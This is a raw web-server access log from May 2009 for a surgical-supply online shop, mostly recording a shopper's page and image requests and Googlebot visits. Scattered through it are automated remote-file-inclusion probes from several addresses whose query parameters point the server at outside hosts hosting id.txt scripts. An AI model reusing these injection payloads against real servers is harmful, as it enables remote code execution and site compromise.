69.141.181.186 - - [07/May/2009:23:56:33 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:33 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:38 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:38 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:38 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:38 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
66.249.72.114 - - [07/May/2009:23:56:40 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E8487D602300C66C041+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:41 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:42 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:56:42 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
66.249.72.114 - - [07/May/2009:23:56:50 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006FC4367259D70014DA075+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
84.54.137.9 - - [07/May/2009:23:56:53 -0400] "GET /playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:23:56:53 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
84.54.137.9 - - [07/May/2009:23:56:53 -0400] "GET /logs/access_log.Q109030500%20%20/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.141.181.186 - - [07/May/2009:23:57:01 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
84.54.137.9 - - [07/May/2009:23:57:04 -0400] "GET /logs/access_log.Q108121300%20%20/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.141.181.186 - - [07/May/2009:23:57:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0035A04B8E00C200774C051+M37+ENG HTTP/1.1" 200 45669 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:24 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04B8E00C200774C051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:24 -0400] "GET /images/items/00320145_THUMB.JPG HTTP/1.1" 200 2238 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04B8E00C200774C051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:25 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04B8E00C200774C051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
66.197.202.64 - - [07/May/2009:23:57:25 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:23:57:25 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 200 352 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:23:57:25 -0400] "GET /logs/access_log.Q108072400///?_SERVER[DOCUMENT_ROOT]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.197.202.64 - - [07/May/2009:23:57:26 -0400] "GET /logs/access_log.Q108081200///?_SERVER[DOCUMENT_ROOT]=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
69.141.181.186 - - [07/May/2009:23:57:32 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0035A04B8C2072007A1C051+WSEQ(S0060):1+OUITEM(A0200):00320145 HTTP/1.1" 200 27013 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:33 -0400] "GET /images/items/00320145_FULL.JPG HTTP/1.1" 200 9679 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0035A04B8C2072007A1C051+WSEQ(S0060):1+OUITEM(A0200):00320145" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
211.110.19.178 - - [07/May/2009:23:57:38 -0400] "GET /logs//?sIncPath=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 351 "-" "Mozilla/5.0"
211.110.19.178 - - [07/May/2009:23:57:38 -0400] "GET //?sIncPath=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
69.141.181.186 - - [07/May/2009:23:57:39 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04B8E00C200774C051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:39 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04B8E00C200774C051+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76103 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:41 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:43 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:45 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
195.20.225.45 - - [07/May/2009:23:57:47 -0400] "GET /logs/error_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
69.141.181.186 - - [07/May/2009:23:57:49 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG HTTP/1.1" 200 52933 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:50 -0400] "GET /images/pf-a.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:57:50 -0400] "GET /images/space.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
218.249.36.194 - - [07/May/2009:23:58:04 -0400] "GET /playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:23:58:04 -0400] "GET /logs/access_log.Q109030500%20%20/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
218.249.36.194 - - [07/May/2009:23:58:04 -0400] "GET /logs/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.141.181.186 - - [07/May/2009:23:58:06 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG HTTP/1.1" 200 45679 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:58:07 -0400] "GET /images/items/00320000_THUMB.JPG HTTP/1.1" 200 2057 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
66.249.72.114 - - [07/May/2009:23:58:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0094E54B7F401100042C043+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.249.36.194 - - [07/May/2009:23:58:14 -0400] "GET /logs/access_log.Q108121300%20%20/playing.php/common/db.php?commonpath=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.141.181.186 - - [07/May/2009:23:58:26 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG HTTP/1.1" 200 47572 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:58:27 -0400] "GET /images/items/00320125_THUMB.JPG HTTP/1.1" 200 3160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
69.141.181.186 - - [07/May/2009:23:58:27 -0400] "GET /images/items/00320104_THUMB.JPG HTTP/1.1" 200 3198 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0035A04D81802200BC2C072+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0)"
62.116.168.108 - - [07/May/2009:23:58:34 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:23:58:34 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 352 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:23:58:34 -0400] "GET /logs/access_log.Q108072400///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
62.116.168.108 - - [07/May/2009:23:58:35 -0400] "GET /logs/access_log.Q108081200///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
